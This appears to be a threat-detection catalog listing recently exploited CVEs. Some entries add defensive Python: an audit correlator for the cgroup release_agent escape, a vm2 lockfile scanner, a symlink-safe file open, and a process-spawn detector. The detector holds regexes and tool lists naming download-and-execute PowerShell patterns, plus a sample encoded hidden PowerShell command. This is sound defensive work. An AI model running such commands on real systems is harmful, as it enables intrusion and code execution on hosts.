Vulnerability Detections
CVE-mapped detections for known-exploited, weaponized, and proof-of-concept vulnerabilities. Each ships ready-to-deploy KQL & SPL detection logic. Filter by vendor, product, CVSS, CWE and exploitation status.
- CVE-2026-20253 KEV
CVE-2026-20253: Splunk Enterprise Missing Authentication for Critical Function
Detects exploitation attempts targeting CVE-2026-20253, a missing authentication vulnerability (CWE-306) in Splunk Enterprise. This KEV-listed vulnerability allows unauthenticated access to critical Splunk functions. Attackers may leverage this to execute searches, exfiltrate data, or manipulate Splunk configurations without valid credentials.
vendor: Splunk | product: Enterprise | cwe: CWE-306 | disclosed: Jun 18, 2026 | cvss: unscored | write-up soon
- CVE-2026-48907 KEV
Widget Factory Joomla Content Editor Improper Access Control (CVE-2026-48907)
Detects exploitation of CVE-2026-48907, an improper access control vulnerability (CWE-284) in the Joomla Content Editor (JCE) plugin by Widget Factory. This vulnerability is actively exploited in the wild (CISA KEV) and allows attackers to bypass access controls, potentially enabling unauthorized file uploads, remote code execution, or administrative actions within Joomla CMS installations.
vendor: Widget Factory | product: Joomla Content Editor | cwe: CWE-284 | disclosed: Jun 16, 2026 | cvss: unscored | write-up soon
- CVE-2026-20262 KEV
Cisco Catalyst SD-WAN Manager Path Traversal Exploitation
Detects exploitation attempts targeting CVE-2026-20262, a path traversal vulnerability (CWE-22) in Cisco Catalyst SD-WAN Manager. Active exploitation has been confirmed by CISA KEV. Attackers can traverse directory boundaries via crafted HTTP requests to access sensitive files outside the web root, potentially exposing credentials, configuration data, or enabling further compromise of the SD-WAN management plane.
vendor: Cisco | product: Catalyst SD-WAN Manager | cwe: CWE-22 | disclosed: Jun 15, 2026 | cvss: unscored | write-up soon
- CVE-2026-54420 KEV
LiteSpeed cPanel Plugin UNIX Symbolic Link (Symlink) Following Vulnerability
Detects exploitation of CVE-2026-54420, a UNIX symbolic link (symlink) following vulnerability in the LiteSpeed cPanel Plugin. Attackers with local access can create malicious symlinks to read or overwrite files outside the intended directory, potentially leading to privilege escalation or unauthorized file access on cPanel-managed hosting servers. This vulnerability is actively exploited in the wild (CISA KEV).
vendor: LiteSpeed | product: cPanel Plugin | cwe: CWE-61 | disclosed: Jun 15, 2026 | cvss: unscored | write-up soon
- CVE-2026-35273 KEV
Oracle PeopleSoft PeopleTools Missing Authentication for Critical Function (CVE-2026-35273)
CVE-2026-35273 is a missing authentication vulnerability (CWE-306) in Oracle PeopleSoft Enterprise PeopleTools. An unauthenticated remote attacker can access critical PeopleSoft functions without authentication, potentially leading to unauthorized data access, privilege escalation, or full system compromise. This vulnerability is listed on CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild.
vendor: Oracle | product: PeopleSoft Enterprise PeopleTools | cwe: CWE-306 | disclosed: Jun 12, 2026 | cvss: unscored | write-up soon
- CVE-2026-10520 KEV
Ivanti Sentry OS Command Injection Exploitation (CVE-2026-10520)
Detects exploitation attempts targeting CVE-2026-10520, an OS command injection vulnerability (CWE-78) in Ivanti Sentry. This vulnerability is actively exploited in the wild (CISA KEV) and allows attackers to inject operating system commands through Ivanti Sentry's administrative or API interfaces, potentially leading to full system compromise. Ivanti Sentry acts as a gateway for enterprise mobile device management, which makes it a high-value target for threat actors seeking persistent access to corporate infrastructure.
vendor: Ivanti | product: Sentry | cwe: CWE-78 | disclosed: Jun 11, 2026 | cvss: unscored | write-up soon
- CVE-2026-11645 KEV
Google Chromium V8 Out-of-Bounds Read and Write Vulnerability (CVE-2026-11645)
Detects exploitation attempts targeting CVE-2026-11645, an out-of-bounds read and write vulnerability in Google Chromium's V8 JavaScript engine. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation yields arbitrary code execution inside the sandboxed renderer process; chained with a separate sandbox-escape bug, it can lead to credential theft and compromise of the host.
vendor: Google | product: Chromium V8 | cwe: CWE-787, CWE-125 | disclosed: Jun 9, 2026 | cvss: unscored | write-up soon
- CVE-2026-20245 KEV
Cisco Catalyst SD-WAN Manager Improper Output Encoding Exploitation
Detects exploitation attempts targeting CVE-2026-20245, an improper encoding or escaping of output vulnerability (CWE-116) in Cisco Catalyst SD-WAN Manager. This vulnerability is actively exploited in the wild (CISA KEV) and may allow attackers to perform privilege escalation or inject malicious content through improperly encoded output. Detection focuses on anomalous authentication patterns, unexpected privilege changes, API abuse, and suspicious management plane activity against SD-WAN Manager instances.
vendor: Cisco | product: Catalyst SD-WAN Manager | cwe: CWE-116 | disclosed: Jun 9, 2026 | cvss: unscored | write-up soon
- CVE-2026-7473 KEV
Arista EOS Incomplete Comparison Authentication Bypass (CVE-2026-7473)
Detects exploitation attempts targeting CVE-2026-7473, an incomplete comparison vulnerability (CWE-1023) in Arista Extensible Operating System (EOS). This flaw allows attackers to bypass authentication or authorization checks due to missing comparison factors, potentially enabling unauthorized access to network device management interfaces. The vulnerability is actively exploited in the wild (CISA KEV). Detection focuses on anomalous management-plane access patterns, unexpected SSH/API sessions, and configuration changes on Arista EOS devices.
vendor: Arista | product: Extensible Operating System | cwe: CWE-1023 | disclosed: Jun 9, 2026 | cvss: unscored | write-up soon
- CVE-2026-42271 KEV
BerriAI LiteLLM Command Injection (CVE-2026-42271)
Detects exploitation of CVE-2026-42271, a command injection vulnerability in BerriAI LiteLLM. An attacker who can reach the LiteLLM API or admin interface may inject OS commands that execute under the LiteLLM process context, leading to remote code execution. The vulnerability is tracked under CWE-78 (OS Command Injection) and CWE-77 (Command Injection) and is listed as actively exploited in CISA KEV.
vendor: BerriAI | product: LiteLLM | cwe: CWE-78, CWE-77 | disclosed: Jun 8, 2026 | cvss: unscored | write-up soon
- CVE-2026-50751 KEV
Check Point Security Gateway Improper Authentication (CVE-2026-50751)
Detects exploitation of CVE-2026-50751, an improper authentication vulnerability (CWE-287) in Check Point Security Gateway affecting the deprecated IKEv1 VPN protocol. This vulnerability is actively exploited in the wild (CISA KEV) and may allow unauthenticated attackers to bypass authentication controls on the VPN gateway. Detection focuses on anomalous IKEv1 negotiation patterns, authentication bypass indicators, and suspicious gateway access following failed or malformed IKE exchanges.
vendor: Check Point | product: Security Gateway | cwe: CWE-287 | disclosed: Jun 8, 2026 | cvss: unscored | write-up soon
- CVE-2026-28318 KEV
SolarWinds Serv-U Uncontrolled Resource Consumption (CVE-2026-28318)
Detects exploitation of CVE-2026-28318, an uncontrolled resource consumption vulnerability (CWE-400) in SolarWinds Serv-U. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and allows attackers to exhaust server resources, leading to denial of service conditions. Detection focuses on abnormal connection patterns, resource exhaustion indicators, and anomalous request volumes targeting Serv-U services.
vendor: SolarWinds | product: Serv-U | cwe: CWE-400 | disclosed: Jun 5, 2026 | cvss: unscored | write-up soon
- CVE-2026-45247 KEV
Mirasvit Full Page Cache Warmer Deserialization RCE (CVE-2026-45247)
Detects exploitation of CVE-2026-45247, a deserialization of untrusted data vulnerability in the Mirasvit Full Page Cache Warmer Magento extension. Successful exploitation allows remote attackers to execute arbitrary code by sending crafted serialized PHP objects to vulnerable endpoints. This CVE is listed in CISA KEV, indicating active exploitation in the wild.
vendor: Mirasvit | product: Mirasvit Full Page Cache Warmer | cwe: CWE-502 | disclosed: Jun 3, 2026 | cvss: unscored | write-up soon
- CVE-2022-0492 KEV
Linux Kernel cgroup v1 release_agent Privilege Escalation (CVE-2022-0492)
CVE-2022-0492 is a Linux kernel vulnerability (CWE-287/CWE-862) in the cgroup v1 release_agent mechanism. A local unprivileged user can exploit improper capability checks to write to /sys/fs/cgroup/*/release_agent and execute arbitrary commands as root, enabling container escape and full host compromise. Exploitation requires the ability to mount cgroup v1 (or to reach a writable release_agent file), so containers running with --privileged or without the default seccomp and AppArmor profiles that block mount and unshare are the realistic targets. This vulnerability is listed on CISA KEV, indicating active exploitation in the wild.
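The release_agent chain described in this entry (mount cgroupfs somewhere writable, point release_agent at an attacker-controlled script, set notify_on_release) leaves a recognizable sequence in host audit data. The following is an added example that correlates that sequence; it is not the catalog's KQL/SPL logic, and the event records below are constructed, with field names (cid, op, fstype, path, data) assumed for a container-aware audit pipeline.

```python
"""Correlate the cgroup v1 release_agent escape pattern across audit-style events.

Added example, not the catalog's own detection logic. Event shape is an assumption.
"""
from collections import defaultdict

# Constructed events. c1 performs the full chain; c2 only rewrites release_agent under
# /sys/fs/cgroup; c3 is benign cgroup tuning and an unrelated mount.
SAMPLE_EVENTS = [
    {'ts': 1, 'cid': 'c1', 'pid': 412, 'op': 'mount', 'fstype': 'cgroup', 'target': '/tmp/cg'},
    {'ts': 2, 'cid': 'c1', 'pid': 412, 'op': 'write', 'path': '/tmp/cg/release_agent', 'data': '/tmp/cg/x/cmd'},
    {'ts': 3, 'cid': 'c1', 'pid': 413, 'op': 'write', 'path': '/tmp/cg/x/notify_on_release', 'data': '1'},
    {'ts': 4, 'cid': 'c2', 'pid': 77, 'op': 'write', 'path': '/sys/fs/cgroup/memory/release_agent', 'data': '/bin/true'},
    {'ts': 5, 'cid': 'c3', 'pid': 90, 'op': 'mount', 'fstype': 'proc', 'target': '/tmp/p'},
    {'ts': 6, 'cid': 'c3', 'pid': 90, 'op': 'write', 'path': '/sys/fs/cgroup/memory/app/memory.limit_in_bytes', 'data': '1073741824'},
]


def under(path, prefix):
    """True when path is prefix itself or lies below it."""
    return path == prefix or path.startswith(prefix.rstrip('/') + '/')


def correlate(events):
    """Return one alert per container that wrote a release_agent file, in cid order."""
    mounts = defaultdict(list)   # cid -> cgroupfs mount targets created inside that container
    alerts = {}                  # cid -> alert dict
    for ev in sorted(events, key=lambda e: e['ts']):
        cid = ev['cid']
        if ev['op'] == 'mount' and ev['fstype'] == 'cgroup':
            mounts[cid].append(ev['target'])
        elif ev['op'] == 'write' and ev['path'].endswith('/release_agent'):
            own_mount = any(under(ev['path'], m) for m in mounts[cid])
            alerts[cid] = {
                'cid': cid, 'pid': ev['pid'], 'path': ev['path'], 'agent': ev['data'],
                # A cgroupfs the actor mounted itself is the CVE-2022-0492 signature; a write
                # under the host's /sys/fs/cgroup is still a root-level control change.
                'severity': 'high' if own_mount or under(ev['path'], '/sys/fs/cgroup') else 'medium',
                'mounted_by_actor': own_mount,
                'notify_on_release': False,
            }
        elif ev['op'] == 'write' and ev['path'].endswith('/notify_on_release') and ev['data'].strip() == '1':
            if cid in alerts:    # the trigger half of the chain, only meaningful after the agent was set
                alerts[cid]['notify_on_release'] = True
    return sorted(alerts.values(), key=lambda a: a['cid'])


if __name__ == '__main__':
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Grouping by container rather than by pid matters: the mount, the release_agent write and the notify_on_release write are often issued by different processes of the same shell session.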
vendor: Linux | product: Kernel | cwe: CWE-287, CWE-862 | disclosed: Jun 2, 2026 | cvss: unscored | write-up soon
- CVE-2024-21182 KEV
Oracle WebLogic Server CVE-2024-21182 Exploitation Attempt
Detects exploitation attempts targeting CVE-2024-21182, an unspecified vulnerability in Oracle WebLogic Server. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Oracle WebLogic Server is a high-value target for threat actors due to its prevalence in enterprise Java EE environments. Exploitation may enable remote code execution, unauthorized data access, or server compromise.
vendor: Oracle | product: WebLogic Server | disclosed: Jun 1, 2026 | cvss: unscored | write-up soon
- CVE-2026-47140 Public PoC
CVE-2026-47140 — vm2 Builtin Denylist Bypass via process/inspector Leads to Host RCE
Detects exploitation of CVE-2026-47140, a critical sandbox escape in the npm vm2 package (versions <= 3.11.3). Attackers bypass the builtin module denylist using process and inspector/promises references to execute arbitrary code on the host Node.js process. CVSS 10.0. PoC is publicly available.
vendor: npm | product: vm2 | cwe: CWE-693 | disclosed: May 29, 2026 | cvss: 10.0 (critical) | write-up soon
- CVE-2026-47208 Public PoC
CVE-2026-47208: vm2 Sandbox Breakout via Promise Species
Detects exploitation of CVE-2026-47208, a critical sandbox escape vulnerability in the vm2 Node.js library (versions <= 3.11.3). Attackers can abuse the Promise species pattern to break out of the vm2 sandbox and execute arbitrary code on the host. This vulnerability has a CVSS score of 10.0 and a public PoC is available.
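Both vm2 entries above give the same affected range (versions <= 3.11.3), so the first practical check is whether a vulnerable copy is installed anywhere in a dependency tree, including transitively. The following is an added example, not code from the vm2 project or from this catalog: it scans an npm lockfile in either the nested v1 layout or the flat v2/v3 "packages" layout. Both lockfiles are constructed, and the 3.12.0 string is only a placeholder for a version outside the stated range, not a claim about which release fixed the bugs.

```python
"""Find vm2 installs inside the affected range (<= 3.11.3) in an npm lockfile.

Added example; lockfiles below are constructed.
"""
import json

AFFECTED_MAX = (3, 11, 3)   # range given by the two catalog entries


def parse_version(v):
    """'3.9.19' -> (3, 9, 19). Prerelease/build tags are dropped, so '3.11.3-beta.1'
    compares equal to 3.11.3 and is treated as affected (the conservative choice)."""
    core = v.lstrip('v').split('-', 1)[0].split('+', 1)[0]
    parts = [int(p) for p in core.split('.') if p.isdigit()]
    return tuple((parts + [0, 0, 0])[:3])


def iter_installed(lock):
    """Yield (name, version, install_path) for lockfile v1 (nested) and v2/v3 (flat)."""
    if 'packages' in lock:
        for path, meta in lock['packages'].items():
            if path and not meta.get('link'):          # '' is the root project; links have no version
                yield path.rsplit('node_modules/', 1)[-1], meta.get('version'), path
        return

    def walk(deps, prefix):
        for name, meta in deps.items():
            path = f'{prefix}node_modules/{name}'
            yield name, meta.get('version'), path
            yield from walk(meta.get('dependencies', {}), path + '/')

    yield from walk(lock.get('dependencies', {}), '')


def affected_vm2(lock_json, name='vm2', max_affected=AFFECTED_MAX):
    """Return sorted (install_path, version) pairs for copies of `name` at or below max_affected."""
    lock = json.loads(lock_json)
    return sorted((path, ver) for n, ver, path in iter_installed(lock)
                  if n == name and ver and parse_version(ver) <= max_affected)


# Constructed lockfile v3: a direct vm2 plus a second copy nested under a plugin.
LOCK_V3 = json.dumps({
    'name': 'app', 'lockfileVersion': 3,
    'packages': {
        '': {'name': 'app', 'dependencies': {'vm2': '3.11.3', 'some-plugin': '1.0.0'}},
        'node_modules/vm2': {'version': '3.11.3'},
        'node_modules/some-plugin': {'version': '1.0.0'},
        'node_modules/some-plugin/node_modules/vm2': {'version': '3.9.19'},
        'node_modules/acorn': {'version': '8.7.0'},
    }})

# Constructed lockfile v1: nested layout, one copy above the range (placeholder version).
LOCK_V1 = json.dumps({
    'name': 'app', 'lockfileVersion': 1,
    'dependencies': {
        'vm2': {'version': '3.12.0'},
        'other-tool': {'version': '2.0.0',
                       'dependencies': {'vm2': {'version': '3.11.3-beta.1'}}},
    }})


if __name__ == '__main__':
    print(affected_vm2(LOCK_V3))
    print(affected_vm2(LOCK_V1))
```

Run it against a real package-lock.json by passing the file contents to affected_vm2; the install path tells you which dependency pulled the vulnerable copy in, which is what you need when the direct dependency is already current.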
vendor: npm | product: vm2 | cwe: CWE-913 | disclosed: May 29, 2026 | cvss: 10.0 (critical) | write-up soon
- CVE-2026-0257 KEV
Palo Alto Networks PAN-OS Authentication Bypass (CVE-2026-0257)
Detects exploitation attempts of CVE-2026-0257, an authentication bypass vulnerability in Palo Alto Networks PAN-OS caused by improper reliance on cookies for security decisions (CWE-565). An attacker can manipulate session cookies to bypass authentication controls on PAN-OS management interfaces or VPN endpoints. This vulnerability is confirmed exploited in the wild (CISA KEV).
vendor: Palo Alto Networks | product: PAN-OS | cwe: CWE-565 | disclosed: May 29, 2026 | cvss: unscored | write-up soon
- CVE-2026-45321 KEV
TanStack Router Unspecified Vulnerability Exploitation
Detects potential exploitation of CVE-2026-45321, an unspecified vulnerability in TanStack Router that has been added to the CISA Known Exploited Vulnerabilities catalog. TanStack Router is a type-safe routing library for React applications. Given KEV status, active exploitation in the wild is confirmed. Detection focuses on anomalous web application behavior, suspicious client-side routing patterns, unexpected server-side request patterns, and post-exploitation indicators consistent with JavaScript framework exploitation.
vendor: TanStack | product: TanStack Router | disclosed: May 27, 2026 | cvss: unscored | write-up soon
- CVE-2026-48027 KEV
Nx Console Embedded Malicious Code Execution (CVE-2026-48027)
CVE-2026-48027 describes an embedded malicious code vulnerability (CWE-506) in Nx Console, a popular VS Code and JetBrains IDE extension for managing Nx monorepos. A compromised or trojanized version of Nx Console contains backdoored code that executes at extension load time within the developer IDE process, enabling attacker-controlled behavior including credential harvesting, reverse shells, or supply chain lateral movement into CI/CD pipelines. This vulnerability is listed in CISA KEV, indicating active exploitation in the wild. Detection focuses on anomalous process spawning from IDE extension host processes, unexpected network connections originating from VS Code or JetBrains runtimes, and suspicious file writes consistent with embedded malicious payloads.
vendor: Nx | product: Nx Console | cwe: CWE-506 | disclosed: May 27, 2026 | cvss: unscored | write-up soon
- CVE-2026-8398 KEV
Daemon Tools Lite Embedded Malicious Code (CVE-2026-8398)
CVE-2026-8398 is a supply chain compromise affecting Daemon Tools Lite, where threat actors embedded malicious code (CWE-506) within the software distribution. Installations of the trojanized version may result in backdoor access, credential theft, or lateral movement from hosts running the compromised software. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Daemon | product: Daemon Tools Lite | cwe: CWE-506 | disclosed: May 27, 2026 | cvss: unscored | write-up soon
- CVE-2026-48172 KEV
LiteSpeed cPanel Plugin Privilege Escalation (CVE-2026-48172)
Detects exploitation of CVE-2026-48172, a privilege escalation vulnerability in the LiteSpeed cPanel Plugin (CWE-266: Incorrect Privilege Assignment). Attackers with low-privileged cPanel access can leverage the plugin's improper privilege handling to elevate to root or administrative system access. This vulnerability is actively exploited in the wild (CISA KEV).
vendor: LiteSpeed | product: cPanel Plugin | cwe: CWE-266 | disclosed: May 26, 2026 | cvss: unscored | write-up soon
- CVE-2026-9082 KEV
Drupal Core SQL Injection Exploitation (CVE-2026-9082)
Detects exploitation attempts targeting CVE-2026-9082, a SQL injection vulnerability in Drupal Core. This KEV-listed vulnerability allows attackers to inject malicious SQL via crafted HTTP requests, potentially leading to unauthorized data access, credential theft, or remote code execution via stacked queries. Active exploitation has been observed in the wild.
vendor: Drupal | product: Core | cwe: CWE-89 | disclosed: May 22, 2026 | cvss: unscored | write-up soon
- CVE-2025-34291 KEV
CVE-2025-34291: Langflow Origin Validation Error Exploitation
Detects exploitation of CVE-2025-34291, an origin validation error (CWE-346) in Langflow that allows attackers to bypass origin checks. This vulnerability is actively exploited in the wild (CISA KEV) and may enable unauthorized access to Langflow API endpoints, flow execution, or administrative functions by bypassing cross-origin restrictions.
vendor: Langflow | product: Langflow | cwe: CWE-346 | disclosed: May 21, 2026 | cvss: unscored | write-up soon
- CVE-2026-34926 KEV
Trend Micro Apex One Directory Traversal Exploitation (CVE-2026-34926)
Detects exploitation attempts targeting CVE-2026-34926, a directory traversal vulnerability (CWE-23) in Trend Micro Apex One (On-Premise). This KEV-listed vulnerability allows unauthenticated or low-privileged attackers to traverse directory boundaries via crafted HTTP requests to the Apex One management server, potentially enabling arbitrary file read or write operations. Active exploitation has been observed in the wild.
vendor: Trend Micro | product: Apex One | cwe: CWE-23 | disclosed: May 21, 2026 | cvss: unscored | write-up soon
- CVE-2008-4250 KEV
MS08-067 NetAPI Buffer Overflow Exploitation Attempt (CVE-2008-4250)
CVE-2008-4250 is a critical buffer overflow vulnerability in the Windows Server service (netapi32.dll) affecting Microsoft Windows XP, 2000, 2003, Vista, and Server 2008. Exploitation via a specially crafted RPC request to the NetpwPathCanonicalize function allows unauthenticated remote code execution as SYSTEM. This vulnerability was exploited by the Conficker worm and remains listed in CISA's Known Exploited Vulnerabilities catalog. Detection focuses on suspicious SMB/RPC activity, NetAPI service anomalies, and post-exploitation indicators including lateral movement and payload staging.
vendor: Microsoft | product: Windows | cwe: CWE-94 | disclosed: May 20, 2026 | cvss: unscored | write-up soon
- CVE-2009-1537 KEV
Microsoft DirectX NULL Byte Overwrite Vulnerability (CVE-2009-1537)
CVE-2009-1537 is a NULL byte overwrite vulnerability in Microsoft DirectX (quartz.dll) that can be exploited via a maliciously crafted QuickTime media file. Successful exploitation allows remote code execution in the context of the logged-on user. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Addressed in MS09-028.
vendor: Microsoft | product: DirectX | disclosed: May 20, 2026 | cvss: unscored | write-up soon
- CVE-2009-3459 KEV
Adobe Acrobat and Reader Heap-Based Buffer Overflow (CVE-2009-3459)
Detects exploitation of a heap-based buffer overflow vulnerability in Adobe Acrobat and Reader (CVE-2009-3459). This CISA KEV vulnerability allows attackers to execute arbitrary code via a crafted PDF file. Exploitation typically results in AcroRd32.exe or Acrobat.exe spawning unexpected child processes, making unusual network connections, or writing executable payloads to disk.
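The behavioural indicators named in this entry (AcroRd32.exe or Acrobat.exe spawning unexpected child processes or writing payloads to disk) are the same parent/child signal the Internet Explorer entries below and the Nx Console entry above (shells spawned from the IDE extension host) rely on. The following is an added example that stands in for the catalog's KQL/SPL and is not its logic: it scores constructed Sysmon Event ID 1 style records. The parent, child and helper image names are ordinary Windows process names chosen for the demo, not a vendor-published list.

```python
"""Flag content-handling parents (readers, browsers, IDEs) spawning shells or payloads.

Added example over constructed process-creation records; names below are demo choices.
"""
import re

DOC_PARENTS = {'acrord32.exe', 'acrobat.exe', 'iexplore.exe'}   # any anomaly is high severity
IDE_PARENTS = {'code.exe', 'idea64.exe'}                         # shells are routine here; need more
SHELL_CHILDREN = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe',
                  'mshta.exe', 'rundll32.exe', 'regsvr32.exe', 'certutil.exe', 'bitsadmin.exe'}
# Helpers these parents launch on their own; alone they are not worth an alert.
BENIGN_CHILDREN = {'acrord32.exe': {'rdrcef.exe', 'acrocef.exe'}, 'acrobat.exe': {'acrocef.exe'},
                   'code.exe': {'node.exe', 'code.exe', 'git.exe'}}
SUSPICIOUS_CMDLINE = re.compile(
    r'-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring|invoke-expression|\biex\b'
    r'|frombase64string|/c\s+start\s+.*\\temp\\', re.I)
WRITABLE_DIRS = re.compile(r'\\(appdata\\local\\temp|temp|downloads|public)\\', re.I)

# Constructed Sysmon-style records (ProcessId, ParentImage, Image, CommandLine).
SAMPLE_EVENTS = [
    {'ProcessId': 1001, 'ParentImage': r'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe',
     'Image': r'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe',
     'CommandLine': '"RdrCEF.exe" --type=renderer'},
    {'ProcessId': 1002, 'ParentImage': r'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe',
     'Image': r'C:\Windows\System32\cmd.exe',
     'CommandLine': r'cmd.exe /c start C:\Users\alice\AppData\Local\Temp\inv.exe'},
    {'ProcessId': 1003, 'ParentImage': r'C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe',
     'Image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'CommandLine': 'powershell.exe -NoLogo'},
    {'ProcessId': 1004, 'ParentImage': r'C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe',
     'Image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
     'CommandLine': 'powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA'},
    {'ProcessId': 1005, 'ParentImage': r'C:\Program Files\Internet Explorer\iexplore.exe',
     'Image': r'C:\Users\alice\AppData\Local\Temp\svch0st.exe', 'CommandLine': 'svch0st.exe'},
    {'ProcessId': 1006, 'ParentImage': r'C:\Windows\explorer.exe',
     'Image': r'C:\Windows\System32\cmd.exe', 'CommandLine': 'cmd.exe'},
]


def basename(image):
    """Lower-cased final path component, tolerating either separator."""
    return image.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def classify(event):
    """Return an alert dict for a suspicious parent/child pair, or None."""
    parent, child = basename(event['ParentImage']), basename(event['Image'])
    if child in BENIGN_CHILDREN.get(parent, set()):
        return None
    reasons = []
    if child in SHELL_CHILDREN:
        reasons.append(f'{parent} spawned {child}')
    if WRITABLE_DIRS.search(event['Image']):
        reasons.append('child image in user-writable directory')
    if SUSPICIOUS_CMDLINE.search(event.get('CommandLine', '')):
        reasons.append('suspicious command line')
    if not reasons:
        return None
    if parent in DOC_PARENTS:
        severity = 'high'
    elif parent in IDE_PARENTS:
        # A terminal shell inside an IDE is routine; require evidence beyond the spawn itself.
        extra = [r for r in reasons if not r.endswith(f'spawned {child}')]
        if not extra:
            return None
        severity = 'high' if len(reasons) >= 2 else 'medium'
    else:
        return None
    return {'pid': event['ProcessId'], 'parent': parent, 'child': child,
            'severity': severity, 'reasons': reasons}


def scan(events):
    """Alerts for every event that classify() flags, in input order."""
    return [alert for alert in map(classify, events) if alert]


if __name__ == '__main__':
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The allowlist for the IDE parents is the important design choice: without it, every integrated-terminal launch from VS Code would fire, and the rule would be tuned off within a day.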
vendor: Adobe | product: Acrobat and Reader | cwe: CWE-119 | disclosed: May 20, 2026 | cvss: unscored | write-up soon
- CVE-2010-0249 KEV
Microsoft Internet Explorer Use-After-Free Vulnerability (CVE-2010-0249)
CVE-2010-0249 is a use-after-free vulnerability (CWE-416) in Microsoft Internet Explorer that allows remote attackers to execute arbitrary code via a specially crafted web page. This vulnerability was actively exploited in the wild (Operation Aurora) and is listed in CISA's Known Exploited Vulnerabilities catalog. Exploitation typically involves a malicious HTML/JavaScript page that triggers memory corruption through manipulated DOM objects, enabling arbitrary code execution in the context of the logged-on user.
vendor: Microsoft | product: Internet Explorer | cwe: CWE-416 | disclosed: May 20, 2026 | cvss: unscored | write-up soon
- CVE-2010-0806 KEV
CVE-2010-0806 Microsoft Internet Explorer Use-After-Free Exploitation
Detects exploitation of CVE-2010-0806, a use-after-free vulnerability in Microsoft Internet Explorer. This vulnerability allows remote attackers to execute arbitrary code via a crafted web page. It is listed in CISA's Known Exploited Vulnerabilities catalog and has been actively exploited in the wild.
vendor: Microsoft | product: Internet Explorer | cwe: CWE-399 | disclosed: May 20, 2026 | cvss: unscored | write-up soon
- CVE-2026-41091 KEV
Microsoft Defender Link Following Privilege Escalation (CVE-2026-41091)
Detects exploitation of CVE-2026-41091, a link-following vulnerability (CWE-59) in Microsoft Defender that allows attackers to follow symbolic links or junction points to access or overwrite privileged files. This vulnerability is actively exploited in the wild (CISA KEV) and can lead to privilege escalation or arbitrary file manipulation in the context of the Defender service.
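This entry and the LiteSpeed cPanel Plugin symlink entry above describe the same failure class: a privileged component opens a path inside a directory an attacker can write to, and follows a link it should not. The following is an added example showing the hardened open beside the naive one; it is not code from either vendor and is not specific to either product. It is POSIX only (Linux/macOS), relying on O_NOFOLLOW and dir_fd-relative opens, and builds its own temporary tree so no paths are assumed.

```python
"""Open a file under a trusted root without following a symlink at any component.

Added example for the CWE-59/CWE-61 entries; POSIX only; builds its own temp tree.
"""
import os
import shutil
import tempfile


def open_under_root(root_fd, relpath, flags=os.O_RDONLY):
    """Walk relpath one component at a time from root_fd, refusing symlinks and '..'."""
    parts = [p for p in relpath.split('/') if p not in ('', '.')]
    if not parts or '..' in parts:
        raise ValueError('path must be a plain relative path without ".."')
    dfd = os.dup(root_fd)
    try:
        for part in parts[:-1]:
            # O_NOFOLLOW makes the open fail if this component is a symlink;
            # O_DIRECTORY rejects anything that is not a directory.
            nfd = os.open(part, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=dfd)
            os.close(dfd)
            dfd = nfd
        # Final component: O_NOFOLLOW again, so a file symlink fails instead of being followed.
        return os.open(parts[-1], flags | os.O_NOFOLLOW, dir_fd=dfd)
    finally:
        os.close(dfd)


def read_under_root(root, relpath):
    """Read a file below root, raising OSError if any component is a symlink."""
    root_fd = os.open(root, os.O_RDONLY | os.O_DIRECTORY)
    try:
        fd = open_under_root(root_fd, relpath)
    finally:
        os.close(root_fd)
    with os.fdopen(fd) as f:
        return f.read()


def demo():
    """Contrast the naive open (follows the link: the CWE-59/61 behaviour) with the hardened one."""
    base = tempfile.mkdtemp()
    try:
        root = os.path.join(base, 'root')
        os.mkdir(root)
        with open(os.path.join(base, 'outside.txt'), 'w') as f:
            f.write('outside')
        with open(os.path.join(root, 'safe.txt'), 'w') as f:
            f.write('inside')
        os.symlink('../outside.txt', os.path.join(root, 'link'))   # file symlink pointing out of root
        os.symlink('..', os.path.join(root, 'dirlink'))            # directory symlink pointing out of root
        results = {'safe': read_under_root(root, 'safe.txt')}
        with open(os.path.join(root, 'link')) as f:                # naive open: reads outside root
            results['naive_followed'] = f.read()
        for key, rel in (('hardened_link', 'link'), ('hardened_dirlink', 'dirlink/outside.txt')):
            try:
                results[key] = read_under_root(root, rel)
            except OSError:
                results[key] = 'refused'
        return results
    finally:
        shutil.rmtree(base)


if __name__ == '__main__':
    print(demo())
```

Checking with os.path.realpath before the open is not equivalent: the link can be swapped in between the check and the open, which is exactly the race the link-following class exploits. Opening component by component with O_NOFOLLOW removes the window.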
vendor: Microsoft | product: Defender | cwe: CWE-59 | disclosed: May 20, 2026 | cvss: unscored | write-up soon
- CVE-2026-45498 KEV
Microsoft Defender Denial of Service Vulnerability (CVE-2026-45498)
CVE-2026-45498 is a Denial of Service vulnerability in Microsoft Defender. Exploitation can cause Defender to crash, hang, or become unresponsive, effectively disabling endpoint protection on affected hosts. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers may leverage this to disable security tooling prior to follow-on intrusion activity.
vendor: Microsoft | product: Defender | disclosed: May 20, 2026 | cvss: unscored | write-up soon
- CVE-2026-42897 KEV
Microsoft Exchange Server Cross-Site Scripting (XSS) Exploitation
